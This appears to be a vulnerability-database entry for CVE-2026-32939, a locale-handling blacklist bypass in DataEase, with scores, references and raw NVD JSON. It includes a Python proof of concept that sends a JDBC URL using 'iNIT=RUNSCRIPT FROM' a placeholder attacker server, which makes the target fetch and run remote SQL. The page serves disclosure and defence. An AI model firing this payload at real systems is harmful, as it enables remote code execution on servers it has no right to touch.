CVE-2026-32939

Description

DataEase is an open source data visualization analysis tool. Versions 2.10.19 and below have inconsistent Locale handling between the JDBC URL validation logic and the H2 JDBC engine's internal parsing. DataEase uses String.toUpperCase() without specifying an explicit Locale, causing its security checks to rely on the JVM's default runtime locale, while H2 JDBC always normalizes URLs using Locale.ENGLISH. In Turkish locale environments (tr_TR), Java converts the lowercase letter i to İ (dotted capital I) instead of the standard I, so a malicious parameter like iNIT becomes İNIT in DataEase's filter (bypassing its blacklist) while H2 still correctly interprets it as INIT. This discrepancy allows attackers to smuggle dangerous JDBC parameters past DataEase's security validation, and the issue has been confirmed as exploitable in real DataEase deployment scenarios running under affected regional settings. The issue has been fixed in version 2.10.20.

CVSS Details

CVSS Score

8.1

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:dataease:dataease:*:*:*:*:*:*:*:* - VULNERABLE

DataEase <= 2.10.19

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# PoC for CVE-2026-32939: DataEase Locale Handling Bypass
# This script demonstrates bypassing the blacklist check using Turkish Locale behavior.
# The lowercase 'i' becomes 'İ' in Turkish, bypassing the 'INIT' check in DataEase,
# but H2 engine interprets it as 'INIT'.

import requests

target_url = "http://target-dataease-instance/api/datasource/validate"

# Malicious JDBC URL payload
# Note: 'iNIT' bypasses the DataEase filter (tr_TR -> İNIT != INIT)
# H2 Engine (en_US -> iNIT -> INIT) executes it.
payload = {
    "jdbcUrl": "jdbc:h2:mem:testdb;iNIT=RUNSCRIPT FROM 'http://attacker-server/exploit.sql'",
    "host": "localhost",
    "port": "8080",
    "dbName": "testdb"
}

try:
    response = requests.post(target_url, json=payload)
    if response.status_code == 200:
        print("[+] Payload sent successfully. Check if the script was executed by H2.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[!] Error: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-32939
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-32939
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-32939/
[4] VulDB https://vuldb.com/cve/CVE-2026-32939
[5] https://github.com/dataease/dataease/commit/8f1c21834a620d37dafb3fa24605c059d0a5b80d
[6] https://github.com/dataease/dataease/releases/tag/v2.10.20
[7] https://github.com/dataease/dataease/security/advisories/GHSA-pj7p-3m49-52qq

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-32939", "sourceIdentifier": "[email protected]", "published": "2026-03-20T04:16:49.150", "lastModified": "2026-03-23T19:25:44.773", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "DataEase is an open source data visualization analysis tool. Versions 2.10.19 and below have inconsistent Locale handling between the JDBC URL validation logic and the H2 JDBC engine's internal parsing. DataEase uses String.toUpperCase() without specifying an explicit Locale, causing its security checks to rely on the JVM's default runtime locale, while H2 JDBC always normalizes URLs using Locale.ENGLISH. In Turkish locale environments (tr_TR), Java converts the lowercase letter i to İ (dotted capital I) instead of the standard I, so a malicious parameter like iNIT becomes İNIT in DataEase's filter (bypassing its blacklist) while H2 still correctly interprets it as INIT. This discrepancy allows attackers to smuggle dangerous JDBC parameters past DataEase's security validation, and the issue has been confirmed as exploitable in real DataEase deployment scenarios running under affected regional settings. The issue has been fixed in version 2.10.20."}, {"lang": "es", "value": "DataEase es una herramienta de análisis de visualización de datos de código abierto. Las versiones 2.10.19 e inferiores tienen un manejo inconsistente de la configuración regional entre la lógica de validación de URL JDBC y el análisis interno del motor JDBC H2. DataEase utiliza String.toUpperCase() sin especificar una configuración regional explícita, lo que hace que sus comprobaciones de seguridad dependan de la configuración regional predeterminada en tiempo de ejecución de la JVM, mientras que H2 JDBC siempre normaliza las URL utilizando Locale.ENGLISH. En entornos de configuración regional turca (tr_TR), Java convierte la letra minúscula i en ? (I mayúscula con punto) en lugar de la I estándar, por lo que un parámetro malicioso como iNIT se convierte en ?NIT en el filtro de DataEase (eludiendo su lista negra) mientras que H2 aún lo interpreta correctamente como INIT. Esta discrepancia permite a los atacantes introducir parámetros JDBC peligrosos más allá de la validación de seguridad de DataEase, y el problema ha sido confirmado como explotable en escenarios de despliegue reales de DataEase ejecutándose bajo configuraciones regionales afectadas. El problema ha sido solucionado en la versión 2.10.20."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "PRESENT", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-178"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:dataease:dataease:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.10.20", "matchCriteriaId": "788CE210-A4A2-469E-B250-E5B1A46FA2CD"}]}]}], "references": [{"url": "https://github.com/dataease/dataease/commit/8f1c21834a620d37dafb3fa246 ... (truncated)